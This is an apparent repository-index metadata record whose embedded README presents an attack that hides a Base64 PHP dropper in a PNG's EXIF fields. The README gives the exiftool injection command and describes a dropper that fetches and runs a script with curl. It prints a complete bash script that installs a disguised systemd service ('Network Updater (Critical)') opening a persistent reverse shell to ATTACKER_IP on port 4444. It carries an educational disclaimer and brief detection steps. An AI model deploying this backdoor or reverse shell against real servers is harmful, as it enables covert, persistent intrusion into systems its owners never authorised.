{"id":28931652,"url":"https://github.com/backdoorali/backdoor-stealth-image-injection","last_synced_at":"2026-07-03T19:03:33.869Z","repository":{"id":297841638,"uuid":"996378916","full_name":"BackdoorAli/Backdoor-Stealth-Image-Injection","owner":"BackdoorAli","description":"Showcasing how uploaded images can be EXIF-injected with payloads to further compromise servers, in this specific case, by stealthily installing a backdoor.","archived":false,"fork":false,"pushed_at":"2026-01-20T20:33:03.000Z","size":928,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2026-01-21T05:33:26.883Z","etag":null,"topics":["cybersecurity-education","educational-project","exif","exif-data-extraction","exif-metadata","image-manipulation","malware-research","offensive-security","payload","persistence","php-backdoor","reverse-shell","steganography"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BackdoorAli.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-06-04T21:40:12.000Z","updated_at":"2026-01-20T20:33:07.000Z","dependencies_parsed_at":"2025-10-07T05:34:21.796Z","dependency_job_id":"4dc44f4f-5807-4695-87d5-23e2f32ca351","html_url":"https://github.com/BackdoorAli/Backdoor-Stealth-Image-Injection","commit_stats":null,"previous_names":["backdoorali/backdoor-stealth-image-injection"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/BackdoorAli/Backdoor-Stealth-Image-Injection","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BackdoorAli%2FBackdoor-Stealth-Image-Injection","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BackdoorAli%2FBackdoor-Stealth-Image-Injection/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BackdoorAli%2FBackdoor-Stealth-Image-Injection/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BackdoorAli%2FBackdoor-Stealth-Image-Injection/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BackdoorAli","download_url":"https://codeload.github.com/BackdoorAli/Backdoor-Stealth-Image-Injection/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BackdoorAli%2FBackdoor-Stealth-Image-Injection/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35097760,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-03T02:00:05.635Z","response_time":110,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity-education","educational-project","exif","exif-data-extraction","exif-metadata","image-manipulation","malware-research","offensive-security","payload","persistence","php-backdoor","reverse-shell","steganography"],"created_at":"2025-06-22T16:07:25.329Z","updated_at":"2026-07-03T19:03:33.864Z","avatar_url":"https://github.com/BackdoorAli.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Overview\nThis project demonstrates how attackers can embed a Base64-encoded malicious payload inside the EXIF metadata of a valid `.png` image. Once uploaded to a vulnerable server, the image can trigger remote command execution or download further malware.\n\nThis educational repository simulates:\n- A valid `stealth_shell.png` with hidden malware in its EXIF fields.\n- A PHP dropper payload (`base64_php_payload.txt`) that retrieves and executes a persistent backdoor.\n- A malicious `shell.sh` that sets up a systemd-based reverse shell.\n\nAuthor: [BackdoorAli](https://github.com/BackdoorAli)\n\n\u003e For educational purposes only. Do not deploy in production or unethical environments.\n\n---\n\n## Files Included\n\n| File                    | Description |\n|-------------------------|-------------|\n| `stealth_shell.png`     | Image containing the Base64-encoded PHP payload injected into EXIF fields |\n| `base64_php_payload.txt`| The actual Base64-encoded dropper PHP payload |\n| `shell.sh`              | Systemd-based reverse shell that gets downloaded and executed |\n\n---\n\n## How the Attack Works\n\n1. Image Creation\n   - A valid `.png` image is prepared (e.g., a portrait of myself for this specific project - refer to my GitHub's pfp).\n\n2. Payload Preparation\n   - A PHP payload is written that:\n     - Uses `curl` to download `shell.sh`.\n     - Saves it to `/tmp/.m`.\n     - Makes it executable and runs it in the background.\n\n3. EXIF Injection\n   - The Base64-encoded PHP is injected into `Comment`, `UserComment`, and `Software` EXIF fields using `exiftool`:\n     ```bash\n     exiftool \\\n       -Comment=\"$(cat base64_php_payload.txt)\" \\\n       -UserComment=\"$(cat base64_php_payload.txt)\" \\\n       -Software=\"$(cat base64_php_payload.txt)\" \\\n       stealth_shell.png\n     ```\n\n4. Execution (Hypothetical)\n   - If a vulnerable backend server extracts the EXIF metadata and passes it to something like:\n     ```php\n     eval(base64_decode($image_exif_data['Comment']));\n     ```\n   - Then the PHP dropper is executed, downloads the backdoor, and grants persistent shell access.\n\n---\n\n## Backdoor (`shell.sh`)\n\nThis script creates a persistent systemd service that launches a reverse shell to an attacker's machine.\n\n```bash\n#!/bin/bash\nSERVICE_NAME=\"system-netupd\"\nSHELL_CMD=\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/4444 0\u003e\u00261'\"\n\ncat \u003c\u003cEOF \u003e /etc/systemd/system/$SERVICE_NAME.service\n[Unit]\nDescription=Network Updater (Critical)\nAfter=network.target\n\n[Service]\nExecStart=$SHELL_CMD\nRestart=always\nType=simple\n\n[Install]\nWantedBy=multi-user.target\nEOF\n\nsystemctl daemon-reexec\nsystemctl daemon-reload\nsystemctl enable $SERVICE_NAME\nsystemctl start $SERVICE_NAME\n```\n\nReplace `ATTACKER_IP` with your actual listener IP/port. \u003e\u003e\u003e AGAIN, hypothetically! \u003c\u003c\u003c\n\n---\n\n## Detection \u0026 Extraction\nTo view the injected payload:\n```bash\nexiftool stealth_shell.png | grep -i comment\n```\n\nTo decode:\n```bash\necho \"\u003cbase64_output\u003e\" | base64 -d\n```\n\n---\n\n## Defensive measures\nSee `defense.md` for detailed strategies on detecting and preventing EXIF-based malware delivery.\n\n---\n\n## Disclaimer\nThis project is for educational and research purposes only. Unauthorised deployment, testing, or use of this payload outside of a legal lab or your own system is strictly prohibited and of YOUR OWN RESPONSIBILITY.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbackdoorali%2Fbackdoor-stealth-image-injection","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbackdoorali%2Fbackdoor-stealth-image-injection","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbackdoorali%2Fbackdoor-stealth-image-injection/lists"}